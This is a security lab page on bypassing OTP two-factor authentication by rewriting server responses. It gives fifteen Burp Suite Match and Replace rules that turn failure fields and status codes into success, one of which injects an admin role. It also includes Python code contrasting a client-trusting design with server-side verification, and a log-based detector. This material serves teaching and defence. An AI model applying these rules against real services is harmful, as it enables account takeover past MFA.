Lab 4: OTP Bypass via Response

OTP bypass via response manipulation vulnerabilities

Difficulty: Low

Lab Overview

This lab demonstrates OTP bypass vulnerabilities where attackers can use Burp Suite to modify OTP verification responses and bypass two-factor authentication.

Objective: Understand how OTP bypass attacks work and how to exploit them using Burp Suite.

OTP Verification

The lab exposes three actions:

  • Verify OTP - test OTP verification with response manipulation
  • Check OTP Status - check the OTP verification status
  • Reset OTP - reset the OTP for a user
OTP Bypass Tester
⚠️ OTP Bypass Warning

This lab demonstrates OTP bypass vulnerabilities:

  • OTP Verification - Bypass OTP verification
  • Status Manipulation - Manipulate OTP status
  • Message Manipulation - Change error messages
  • Code Manipulation - Change validation codes
Burp Suite Rules

Use these Burp Suite Match and Replace rules:

  • "valid":false → "valid":true
  • "verified":false → "verified":true
  • "status":"invalid" → "status":"success"
  • "code":"invalid" → "code":"valid"
Vulnerability Details
  • Type: OTP Bypass via Response
  • Severity: High
  • Method: Burp Suite Match and Replace
  • Issue: Client-side trust of OTP responses
Attack Vectors
  • OTP Validation Bypass: Change false to true
  • Status Code Bypass: Change invalid to success
  • Message Manipulation: Change error messages
  • Code Manipulation: Change validation codes
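The issue listed above is that the client is trusted to act on the OTP response. The following added example (not the lab's own code) models a small OTP flow in Python to show why the Match and Replace rules on this page work against one design and fail against the other. The `session` dict is an assumed stand-in for a server-side session store keyed by a session cookie; the protected endpoints, the `otp_verified` request flag and the 6-digit code format are all constructed for the example.

```python
import hmac
import json
import re
import secrets
import time

# Added example, not the lab's code. "session" stands in for a server-side
# session store keyed by a session cookie (an assumption for the demo).
OTP_TTL_SECONDS = 300
MAX_ATTEMPTS = 5


def issue_otp(session, now=None):
    """Generate a 6-digit OTP and bind it to the session on the server."""
    code = f"{secrets.randbelow(10**6):06d}"
    session.update(otp=code, otp_issued=time.time() if now is None else now,
                   otp_attempts=0, otp_verified=False)
    return code  # delivered out of band (SMS/e-mail); never echoed in a response


def verify_otp(session, submitted, now=None):
    """Server-side check. The JSON sent back is informational only; the
    authoritative outcome is session['otp_verified']."""
    now = time.time() if now is None else now
    expected = session.get("otp")
    if expected is None or now - session.get("otp_issued", 0) > OTP_TTL_SECONDS:
        return {"valid": False, "message": "OTP expired"}
    if session["otp_attempts"] >= MAX_ATTEMPTS:
        return {"valid": False, "message": "Too many attempts"}
    session["otp_attempts"] += 1
    if hmac.compare_digest(expected.encode(), submitted.encode()):
        session["otp_verified"] = True
        session.pop("otp")  # one-time: a used code cannot be replayed
        return {"valid": True, "message": "OTP verified"}
    return {"valid": False, "message": "Please enter the valid OTP"}


# Vulnerable design: the follow-up request carries the client's belief about
# the OTP result (a flag the browser set after reading the response body).
def protected_vulnerable(session, request):
    return 200 if request.get("otp_verified") == "true" else 401


# Hardened design: only the server-side session state decides.
def protected_hardened(session, request):
    return 200 if session.get("otp_verified") is True else 401


# The page's first Match and Replace rule, applied to the response body.
# It assumes compact JSON ("valid":false with no space after the colon).
RULE_VALID = (re.compile(r'"valid":false'), '"valid":true')


def simulate_bypass(protected):
    """Wrong code submitted, response flipped in transit, client proceeds."""
    session = {}
    code = issue_otp(session)
    wrong = f"{(int(code) + 1) % 10**6:06d}"  # always differs from the real code
    body = json.dumps(verify_otp(session, wrong), separators=(",", ":"))
    tampered = RULE_VALID[0].sub(RULE_VALID[1], body)
    client_view = json.loads(tampered)  # what the browser-side script now sees
    request = {"otp_verified": "true" if client_view["valid"] else "false"}
    return protected(session, request)


def legitimate_flow():
    """Correct code, untampered response: access granted once, replay refused."""
    session = {}
    code = issue_otp(session)
    first = verify_otp(session, code)["valid"]
    status = protected_hardened(session, {}) if first else 401
    replay = verify_otp(session, code)["valid"]
    return status, replay


def lockout_demo():
    """After MAX_ATTEMPTS wrong codes even the right code is refused."""
    session = {}
    code = issue_otp(session)
    wrong = f"{(int(code) + 1) % 10**6:06d}"
    for _ in range(MAX_ATTEMPTS):
        verify_otp(session, wrong)
    return verify_otp(session, code)["valid"]


if __name__ == "__main__":
    print("vulnerable:", simulate_bypass(protected_vulnerable))  # 200: bypassed
    print("hardened:  ", simulate_bypass(protected_hardened))    # 401: flip is useless
    print("legit:     ", legitimate_flow())                      # (200, False)
    print("lockout:   ", lockout_demo())                         # False
```

The point of the two `protected_*` functions is the only line that differs: one reads a value the client chose, the other reads a value the server set. Every rule in the list below edits bytes between the server and the browser, so it can only influence the first design.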
OTP Bypass Examples

Use these Burp Suite Match and Replace rules to exploit OTP bypass vulnerabilities:

1. OTP Validation Bypass (bypasses OTP validation; "valid":false becomes "valid":true):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"valid\":false", "string_replace": "\"valid\":true" }

2. OTP Verification Bypass (bypasses OTP verification; "verified":false becomes "verified":true):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"verified\":false", "string_replace": "\"verified\":true" }

3. Status Code Bypass (bypasses status validation; "status":"invalid" becomes "status":"success"):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"invalid\"", "string_replace": "\"status\":\"success\"" }

4. Validation Code Bypass (bypasses code validation; "code":"invalid" becomes "code":"valid"):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"code\":\"invalid\"", "string_replace": "\"code\":\"valid\"" }

5. Error Message Bypass (changes the error message; "Please enter the valid OTP" becomes "valid OTP"):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"message\":\"Please enter the valid OTP\"", "string_replace": "\"message\":\"valid OTP\"" }

6. Invalid Code Bypass (removes the error message; "Invalid OTP." becomes ""):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"Invalid OTP.\"", "string_replace": "\"\"" }

7. Response Code Bypass (bypasses response validation; "response":"invalid code" becomes "response":"success"):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"response\":\"invalid code\"", "string_replace": "\"response\":\"success\"" }

8. Error Code Bypass (changes error to success; "error":"Invalid code" becomes "success":"valid code"):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"error\":\"Invalid code\"", "string_replace": "\"success\":\"valid code\"" }

9. Code Not Found Bypass (bypasses code-not-found errors; "CodeNotFound" becomes "codeverified"):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"CodeNotFound\"", "string_replace": "\"codeverified\"" }

10. Incorrect Verification Bypass (changes verification errors; "Incorrect Verification Code" becomes "verified OTP code"):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"Incorrect Verification Code\"", "string_replace": "\"verified OTP code\"" }

11. Status Code 401 Bypass (bypasses 401 status codes in the body; "status":401 becomes "status":200):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":401", "string_replace": "\"status\":200" }

12. Status Code 400 Bypass (bypasses 400 status codes in the body; "status":400 becomes "status":200):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":400", "string_replace": "\"status\":200" }

13. Status Code 404 Bypass (bypasses 404 status codes in the body; "code":404 becomes "code":200):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"code\":404", "string_replace": "\"code\":200" }

14. Invalid Status Bypass (bypasses an invalid status; "status":"INVALID" becomes "status":"VERIFIED"):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": ":\"INVALID\"", "string_replace": ":\"VERIFIED\"" }

15. Simple Status Bypass (literal, non-regex match; {"status":"0"} becomes {"status":"1","user_type":"admin"}):
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": true, "rule_type": "response_body", "string_match": "{\"status\":\"0\"}", "string_replace": "{\"status\":\"1\",\"user_type\":\"admin\"}" }

All of these rules have "rule_type": "response_body", so they act on the response after the server has already produced it; rules 1-14 use "is_simple_match": false and are therefore interpreted as regular expressions, while rule 15 is a plain string match.
Real-World Attack Scenarios
Mitigation Strategies
  • Validate and verify the OTP on the server, and base the access decision on the server-side result rather than on anything the client reports back
  • Use response integrity checks and signatures
  • Implement proper authentication and authorization
  • Use secure coding practices
  • Perform regular security testing and vulnerability assessments
  • Monitor for unusual response patterns
  • Implement proper input validation
  • Use secure session management
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use OTP bypass detection tools
  • Implement proper audit trails
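The monitoring, logging and detection items above are easiest to act on if the server logs its own OTP verdict (the value it computed, not the body the client received) alongside each request. The following added example, which is not part of the lab, runs two checks over constructed log lines in Python: a session that reaches a protected path with a 200 after its last server-side OTP verdict was not "valid", and a session that produces a burst of invalid attempts. The log format, field names (`sid`, `otp_result`), paths and thresholds are all assumptions for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (assumption: one line per request, with the
# session id, path, HTTP status, and the server's own OTP verdict when the
# request hit the verify endpoint). Not real lab output.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z sid=s1 POST /api/otp/verify status=200 otp_result=invalid
2024-05-01T10:00:03Z sid=s1 GET /account/dashboard status=200
2024-05-01T10:01:00Z sid=s2 POST /api/otp/verify status=200 otp_result=valid
2024-05-01T10:01:02Z sid=s2 GET /account/dashboard status=200
2024-05-01T10:02:00Z sid=s3 POST /api/otp/verify status=200 otp_result=invalid
2024-05-01T10:02:01Z sid=s3 POST /api/otp/verify status=200 otp_result=invalid
2024-05-01T10:02:02Z sid=s3 POST /api/otp/verify status=200 otp_result=invalid
2024-05-01T10:02:03Z sid=s3 POST /api/otp/verify status=200 otp_result=invalid
2024-05-01T10:02:04Z sid=s3 POST /api/otp/verify status=200 otp_result=invalid
2024-05-01T10:02:05Z sid=s3 POST /api/otp/verify status=200 otp_result=invalid
2024-05-01T10:05:00Z sid=s4 GET /account/dashboard status=401
"""

LINE = re.compile(
    r"^(?P<ts>\S+) sid=(?P<sid>\S+) (?P<method>\S+) (?P<path>\S+) status=(?P<status>\d+)"
    r"(?: otp_result=(?P<otp>\S+))?$"
)
PROTECTED_PREFIX = "/account/"       # assumed: paths that require a completed OTP step
VERIFY_PATH = "/api/otp/verify"      # assumed: the OTP verification endpoint
BRUTE_FORCE_THRESHOLD = 5
BRUTE_FORCE_WINDOW = timedelta(minutes=1)


def parse(log_text):
    """Parse the constructed log format into event dicts; unknown lines are skipped."""
    events = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # do not let one malformed line stop the detector
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        e["status"] = int(e["status"])
        events.append(e)
    return events


def detect(log_text):
    """Return {session id: [alert names]} for the two patterns described above."""
    alerts = defaultdict(list)
    last_verdict = {}             # sid -> last server-side OTP verdict
    failures = defaultdict(list)  # sid -> timestamps of recent invalid attempts
    for e in parse(log_text):
        sid = e["sid"]
        if e["path"] == VERIFY_PATH:
            last_verdict[sid] = e["otp"]
            if e["otp"] != "valid":
                recent = [t for t in failures[sid] if e["ts"] - t <= BRUTE_FORCE_WINDOW]
                recent.append(e["ts"])
                failures[sid] = recent
                if len(recent) >= BRUTE_FORCE_THRESHOLD and "otp_brute_force" not in alerts[sid]:
                    alerts[sid].append("otp_brute_force")
        elif e["path"].startswith(PROTECTED_PREFIX) and e["status"] == 200:
            # A 200 on a protected path is only expected after a server-side "valid".
            if last_verdict.get(sid) != "valid":
                alerts[sid].append("protected_access_without_valid_otp")
    return dict(alerts)


if __name__ == "__main__":
    for sid, names in detect(SAMPLE_LOG).items():
        print(sid, names)
```

Session s1 is the response-manipulation case: the server recorded an invalid verdict, yet the same session was served a protected page, which is exactly the gap a client-trusting design opens. Session s2 is the normal path and produces no alert, and s4 was correctly refused. The first check only works when the logged verdict is the server's own, which is why logging it at the verify endpoint matters more than logging the response body.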